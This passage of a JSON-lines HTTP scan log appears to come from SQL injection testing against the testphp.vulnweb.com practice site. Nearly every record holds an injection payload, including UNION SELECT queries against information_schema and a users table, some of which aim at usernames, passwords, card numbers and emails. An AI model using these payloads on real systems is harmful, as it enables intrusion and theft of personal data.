ageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:15.094345584Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-20%20UNION%20SELECT%2011,%201,%202,%203,%204,%205,%20COLUMN_N\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-20%20UNION%20SELECT%2011,%201,%202,%203,%204,%205,%20COLUMN_N\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-20%20UNION%20SELECT%2011,%201,%202,%203,%204,%205,%20COLUMN_N\",\"time\":\"356.504452ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4870,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:18.361374471Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-20%20UNION%20SELECT%2011,%201,%202,%203,%204,%205,%20COLUMN_NAME,%207,%208,%209,%2010%20FROM%20INFORMATION_SCHEMA.COLUM\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-20%20UNION%20SELECT%2011,%201,%202,%203,%204,%205,%20COLUMN_NAME,%207,%208,%209,%2010%20FROM%20INFORMATION_SCHEMA.COLUM\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-20%20UNION%20SELECT%2011,%201,%202,%203,%204,%205,%20COLUMN_NAME,%207,%208,%209,%2010%20FROM%20INFORMATION_SCHEMA.COLUM\",\"time\":\"345.293182ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":105,\"status_code\":200,\"content_length\":4872,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:18.463323205Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-20%20UNION%20SELECT%2011,%201,%202,%203,%204,%205,%20COLUMN_NAME,%207,%208,%209,%2010%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20N'users'\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-20%20UNION%20SELECT%2011,%201,%202,%203,%204,%205,%20COLUMN_NAME,%207,%208,%209,%2010%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20N'users'\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-20%20UNION%20SELECT%2011,%201,%202,%203,%204,%205,%20COLUMN_NAME,%207,%208,%209,%2010%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20N'users'\",\"time\":\"345.988276ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":622,\"lines\":103,\"status_code\":200,\"content_length\":8112,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:18.54702609Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-20%20UNION%20SELECT%2011,%20uname,%202,%203,%204,%205,%20pass,%20\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-20%20UNION%20SELECT%2011,%20uname,%202,%203,%204,%205,%20pass,%20\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-20%20UNION%20SELECT%2011,%20uname,%202,%203,%204,%205,%20pass,%20\",\"time\":\"349.556512ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:18.611788331Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-20%20UNION%20SELECT%2011,%20uname,%202,%203,%204,%205,%20pass,%207,%208,%209,%2010%20FROM%20users\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-20%20UNION%20SELECT%2011,%20uname,%202,%203,%204,%205,%20pass,%207,%208,%209,%2010%20FROM%20users\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-20%20UNION%20SELECT%2011,%20uname,%202,%203,%204,%205,%20pass,%207,%208,%209,%2010%20FROM%20users\",\"time\":\"347.61803ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":103,\"status_code\":200,\"content_length\":5150,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:18.982244042Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-999\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-999\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-999\",\"time\":\"343.02533ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":477,\"lines\":103,\"status_code\":200,\"content_length\":4699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:19.338832005Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-9999%20UNION%20SELECT%201,2,3,4,5,6,pass,8,9,10,11%20FROM%20users\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-9999%20UNION%20SELECT%201,2,3,4,5,6,pass,8,9,10,11%20FROM%20users\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-9999%20UNION%20SELECT%201,2,3,4,5,6,pass,8,9,10,11%20FROM%20users\",\"time\":\"348.202784ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":103,\"status_code\":200,\"content_length\":5146,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:19.438807994Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-999999++UNION+SELECT+1%2Cuname%2C3%2C4%2C5%2C6%2Cversion%28%29%2C8%2Cpass%2C10%2C11+FROM+users\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-999999++UNION+SELECT+1%2Cuname%2C3%2C4%2C5%2C6%2Cversion%28%29%2C8%2Cpass%2C10%2C11+FROM+users\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-999999++UNION+SELECT+1%2Cuname%2C3%2C4%2C5%2C6%2Cversion%28%29%2C8%2Cpass%2C10%2C11+FROM+users\",\"time\":\"352.9354ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":103,\"status_code\":200,\"content_length\":5171,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:19.614988675Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=.1\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=.1\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=.1\",\"time\":\"352.580845ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":477,\"lines\":103,\"status_code\":200,\"content_length\":4699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:20.091169439Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=.1'\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=.1'\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=.1'\",\"time\":\"343.987199ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4976,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:20.258707483Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=.1+union+all+select+1,2,3,4,5,6,7,8,9,10,11--\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=.1+union+all+select+1,2,3,4,5,6,7,8,9,10,11--\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=.1+union+all+select+1,2,3,4,5,6,7,8,9,10,11--\",\"time\":\"349.952038ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":103,\"status_code\":200,\"content_length\":5143,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:21.893344732Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=.1+union+all+select+1,2,3,4,5,6,7,8,9,10,version(\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=.1+union+all+select+1,2,3,4,5,6,7,8,9,10,version(\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=.1+union+all+select+1,2,3,4,5,6,7,8,9,10,version(\",\"time\":\"342.281624ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:22.967274159Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=.1+union+all+select+1,group_concat(column_name\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=.1+union+all+select+1,group_concat(column_name\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=.1+union+all+select+1,group_concat(column_name\",\"time\":\"349.837224ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:23.228885863Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=.1+union+all+select+1,group_concat(table_name\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=.1+union+all+select+1,group_concat(table_name\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=.1+union+all+select+1,group_concat(table_name\",\"time\":\"341.076022ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:23.567153541Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=.1+union+all+select+1,group_concat(uname,0x3a,pass,0x3a,email\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=.1+union+all+select+1,group_concat(uname,0x3a,pass,0x3a,email\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=.1+union+all+select+1,group_concat(uname,0x3a,pass,0x3a,email\",\"time\":\"349.115982ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:24.332901347Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1\",\"time\":\"343.743246ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":640,\"lines\":108,\"status_code\":200,\"content_length\":7880,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:24.42703701Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%0A%0APour\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%0A%0APour\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1%0A%0APour\",\"time\":\"339.961165ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4979,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:24.427330196Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%0A%0A%0Avoici\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%0A%0A%0Avoici\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1%0A%0A%0Avoici\",\"time\":\"354.087202ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4980,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:24.457630568Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=0.or-1%23\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=0.or-1%23\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=0.or-1%23\",\"time\":\"347.216071ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2818,\"lines\":187,\"status_code\":200,\"content_length\":49414,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:24.491268691Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,2,3,4%20from%20information_schema.tables--%20-\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,2,3,4%20from%20information_schema.tables--%20-\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,2,3,4%20from%20information_schema.tables--%20-\",\"time\":\"351.534713ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":501,\"lines\":105,\"status_code\":200,\"content_length\":4890,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:24.845467498Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables--%20-\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables--%20-\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables--%20-\",\"time\":\"348.118395ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2206,\"lines\":108,\"status_code\":200,\"content_length\":44333,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:24.871854016Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20OR%20\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20OR%20\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1%20OR%20\",\"time\":\"352.694759ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:24.942755661Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20OR%2017-7%3d10CONFIRMED\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20OR%2017-7%3d10CONFIRMED\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1%20OR%2017-7%3d10CONFIRMED\",\"time\":\"356.560373ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4875,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:24.945623929Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,table_name,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables--%20-\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,table_name,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables--%20-\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,table_name,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables--%20-\",\"time\":\"352.351923ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2206,\"lines\":108,\"status_code\":200,\"content_length\":45584,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:25.034464681Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20OR%2017-7%3d10\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20OR%2017-7%3d10\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1%20OR%2017-7%3d10\",\"time\":\"355.779893ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2818,\"lines\":187,\"status_code\":200,\"content_length\":49414,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:25.122844752Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20UNION%20SELECT%20\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20UNION%20SELECT%20\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1%20UNION%20SELECT%20\",\"time\":\"358.325073ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:25.151008243Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20UNION%20SELECT%201,%202,%203,%204,%205,%206,%20Table_name%20as%20TablesName,%208,%209\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20UNION%20SELECT%201,%202,%203,%204,%205,%206,%20Table_name%20as%20TablesName,%208,%209\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1%20UNION%20SELECT%201,%202,%203,%204,%205,%206,%20Table_name%20as%20TablesName,%208,%209\",\"time\":\"357.330146ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4872,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:25.278971372Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20and%201=1\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20and%201=1\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1%20and%201=1\",\"time\":\"357.578903ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":640,\"lines\":108,\"status_code\":200,\"content_length\":7880,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:25.296096879Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,2,3,4,5,6,group_concat(uname,%22:%22,pass,%22::%22,cc,%22:::%22,address,%22::::%22,email\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,2,3,4,5,6,group_concat(uname,%22:%22,pass,%22::%22,cc,%22:::%22,address,%22::::%22,email\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1%20union%20select%201,2,3,4,5,6,group_concat(uname,%22:%22,pass,%22::%22,cc,%22:::%22,address,%22::::%22,email\",\"time\":\"353.322717ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:25.35381163Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20UNION%20SELECT%201,%202,%203,%204,%205,%206,%20Table_name%20as%20TablesName,%208,%209,%2010,%2011%20FROM%20information_schema.tables\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20UNION%20SELECT%201,%202,%203,%204,%205,%206,%20Table_name%20as%20TablesName,%208,%209,%2010,%2011%20FROM%20information_schema.tables\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1%20UNION%20SELECT%201,%202,%203,%204,%205,%206,%20Table_name%20as%20TablesName,%208,%209,%2010,%2011%20FROM%20information_schema.tables\",\"time\":\"356.268268ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2206,\"lines\":108,\"status_code\":200,\"content_length\":45584,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:25.465286373Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,2,3,4,5,6,group_concat(uname,%22:%22,pass,%22::%22,cc,%22:::%22,address,%22::::%22,email),8,9,10,11%20from%20users\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,2,3,4,5,6,group_concat(uname,%22:%22,pass,%22::%22,cc,%22:::%22,address,%22::::%22,email),8,9,10,11%20from%20users\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1%20union%20select%201,2,3,4,5,6,group_concat(uname,%22:%22,pass,%22::%22,cc,%22:::%22,address,%